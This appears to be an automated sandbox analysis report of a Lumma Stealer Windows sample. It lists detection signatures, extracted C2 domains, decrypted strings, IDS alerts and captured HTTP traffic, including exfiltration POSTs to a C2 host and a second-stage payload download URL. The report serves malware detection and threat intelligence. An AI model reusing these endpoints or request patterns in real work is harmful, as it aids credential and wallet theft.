Windows Analysis Report
TmmiCE5Ulm.exe

Overview

General Information

Sample name:TmmiCE5Ulm.exe
renamed because original name is a hash value
Original sample name:39a156657be03cc94d69874b25836b8c.exe
Analysis ID:1579676
MD5:39a156657be03cc94d69874b25836b8c
SHA1:c23e004baca2916e986c556974abaab7783bdba7
SHA256:5bfd8db573ebaf03ceffdbe9a0b94a69574930222253a4de5ad02e2e735c9041
Tags:exe, user-abuse_ch

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • TmmiCE5Ulm.exe (PID: 5600 cmdline: "C:\Users\user\Desktop\TmmiCE5Ulm.exe" MD5: 39A156657BE03CC94D69874B25836B8C)
    • WerFault.exe (PID: 3720 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 1924 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["energyaffai.lat", "grannyejh.lat", "sustainskelet.lat", "discokeyus.lat", "necklacebudi.lat", "rapeflowwj.lat", "aspecteirs.lat", "sweepyribs.lat", "crosshuaht.lat"], "Build id": "LOGS11--LiveTraffic"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000000.00000003.2228599565.000000000118B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2231964807.0000000001154000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2232123533.0000000001154000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2231739674.0000000001154000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T07:26:22.907787+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | TCP
2024-12-23T07:26:25.273559+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-23T07:26:27.523188+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-23T07:26:30.005399+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 104.21.66.86 | 443 | TCP
2024-12-23T07:26:32.418082+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 104.21.66.86 | 443 | TCP
2024-12-23T07:26:34.851601+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 104.21.66.86 | 443 | TCP
2024-12-23T07:26:37.433944+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49713 | 104.21.66.86 | 443 | TCP
2024-12-23T07:26:39.946896+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49716 | 104.21.66.86 | 443 | TCP
2024-12-23T07:26:45.605600+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49733 | 104.21.66.86 | 443 | TCP
2024-12-23T07:26:48.168779+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49739 | 185.166.143.49 | 443 | TCP
2024-12-23T07:26:50.605999+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49745 | 3.5.16.86 | 443 | TCP
2024-12-23T07:26:26.025898+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-23T07:26:28.306228+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-23T07:26:46.388182+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49733 | 104.21.66.86 | 443 | TCP
2024-12-23T07:26:26.025898+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-23T07:26:28.306228+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-23T07:26:20.737542+0100 | 2058354 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 51972 | 1.1.1.1 | 53 | UDP
2024-12-23T07:26:21.049421+0100 | 2058358 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 59507 | 1.1.1.1 | 53 | UDP
2024-12-23T07:26:20.251882+0100 | 2058360 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 53300 | 1.1.1.1 | 53 | UDP
2024-12-23T07:26:20.575002+0100 | 2058362 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 57487 | 1.1.1.1 | 53 | UDP
2024-12-23T07:26:19.969987+0100 | 2058364 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 53483 | 1.1.1.1 | 53 | UDP
2024-12-23T07:26:20.422354+0100 | 2058370 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 56533 | 1.1.1.1 | 53 | UDP
2024-12-23T07:26:21.191727+0100 | 2058374 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 56488 | 1.1.1.1 | 53 | UDP
2024-12-23T07:26:20.908101+0100 | 2058376 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 62063 | 1.1.1.1 | 53 | UDP
2024-12-23T07:26:19.826811+0100 | 2058378 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 57658 | 1.1.1.1 | 53 | UDP
2024-12-23T07:26:38.213154+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49713 | 104.21.66.86 | 443 | TCP
2024-12-23T07:26:39.957213+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.5 | 49716 | 104.21.66.86 | 443 | TCP
2024-12-23T07:26:23.688885+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | TCP

                AV Detection

Source: TmmiCE5Ulm.exe, Avira: detected
Source: TmmiCE5Ulm.exe.5600.0.memstrmin, Malware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "grannyejh.lat", "sustainskelet.lat", "discokeyus.lat", "necklacebudi.lat", "rapeflowwj.lat", "aspecteirs.lat", "sweepyribs.lat", "crosshuaht.lat"], "Build id": "LOGS11--LiveTraffic"}
Source: TmmiCE5Ulm.exe, ReversingLabs: Detection: 57%
Source: TmmiCE5Ulm.exe, Virustotal: Detection: 69%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: TmmiCE5Ulm.exe, Joe Sandbox ML: detected
Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, String decryptor:
  rapeflowwj.lat
  crosshuaht.lat
  sustainskelet.lat
  aspecteirs.lat
  energyaffai.lat
  necklacebudi.lat
  discokeyus.lat
  grannyejh.lat
  sweepyribs.lat
  lid=%s&j=%s&ver=4.0
  TeslaBrowser/5.5
  - Screen Resoluton:
  - Physical Installed Memory:
  Workgroup: -
  LOGS11--LiveTraffic
Source: TmmiCE5Ulm.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 3.5.16.86:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe, Directory queried: number of queries: 1001

                Networking

Source: Network traffic, Suricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.5:56533 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.5:62063 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.5:53483 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.5:59507 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.5:56488 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.5:53300 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.5:57658 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.5:57487 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.5:51972 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 23.55.153.106:443
Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 104.21.66.86:443
Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.66.86:443
Source: Network traffic, Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49713 -> 104.21.66.86:443
Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 104.21.66.86:443
Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.66.86:443
Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49733 -> 104.21.66.86:443
Source: Network traffic, Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49716 -> 104.21.66.86:443
Source: Malware configuration extractor, URLs: energyaffai.lat, grannyejh.lat, sustainskelet.lat, discokeyus.lat, necklacebudi.lat, rapeflowwj.lat, aspecteirs.lat, sweepyribs.lat, crosshuaht.lat
Source: Joe Sandbox View, IP Address: 104.21.66.86
Source: Joe Sandbox View, IP Address: 23.55.153.106
Source: Joe Sandbox View, IP Address: 185.166.143.49
Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.66.86:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.66.86:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.66.86:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.66.86:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 23.55.153.106:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.66.86:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 104.21.66.86:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49739 -> 185.166.143.49:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 104.21.66.86:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49733 -> 104.21.66.86:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49745 -> 3.5.16.86:443
Source: global traffic, HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Host: steamcommunity.com
Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: lev-tolstoi.com
Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 53
  Host: lev-tolstoi.com
Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=0UCQVNE1GL0P
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 12805
  Host: lev-tolstoi.com
Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=BHAYJ4KONJV7SU6NGE
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 15083
  Host: lev-tolstoi.com
Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=I71U69D925SI
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 20537
  Host: lev-tolstoi.com
Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=HZ3IPPG7Q7N
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 1223
  Host: lev-tolstoi.com
Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=H8XL4F3YH8PVAL
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 551287
  Host: lev-tolstoi.com
Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 88
  Host: lev-tolstoi.com
Source: global traffic, HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNNKAFY4FX&Signature=JhHfBCFLHyX01YjJtloXBFvJXdM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJIMEYCIQDWGRIMb9LXXZfl79VFTq%2FskFvxmioOtofL0dfIDqFZ2gIhAJP8GSyu6qftK4UeqX9cHuX5XOOr967KFLOAaxmwQGOTKrACCM%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2Igx0FWF5ybJCkmhX8pgqhAI4vlZyemYNIdhtILr1PBwGVPbyRawX2P9SOAz2sH4A2MXWbLs4VI9hExZK0Et1K%2FZfcAv2DK2%2F%2F3UbHXRF09xPQgClbYp%2BUS1fkeGjEn1qP%2BWN%2F0mNeOH6WJKEOgO9kxNbGmFR5%2FkdpRFho4uTMfUFiKjlhLrQRw6zkgUAadjCAt42zf2Eg5d4xi8HlEW7deLbE%2FM71ylNr%2FYb3X3TrZqMv1qaJkHPadg%2BUk0sct3PeuuUp0CaqVtex3wqgZbKjEbcNjMQ31Hh7gqXTU6knOY57iFcj%2BPJ5cpn8pXxspPZdFJdCoU3R2oQlF2BkZWmj6nywk6Rq9sTdCADM4SjzSxySMlaGzDBgqS7BjqcAXQQ9opzWNiG8NvY5n4BKs1tDtNnnJkDK9ZBfjAjPIA8iWxzfe9xFtNIbh1RExp6zD%2B7N2NmnwOrDW8mME7nCVE9fi5w6eJ3rXchZXw4BEgi14dReaKJTufHw9TIjvP6fx%2Fjz6IH7b9xdtcTbF%2FIWmng5vjYbTyPUCVFxV5VFqpkIGpa3GEdHu1RK6Fla4M5z4Tr1RQW9xDqc9Tzpg%3D%3D&Expires=1734936649 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
www.youtube.com (Youtube)
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: a/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: d.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: unknown
                HTTP traffic detected:
                POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8
                Host: lev-tolstoi.com
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.000000000110D000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
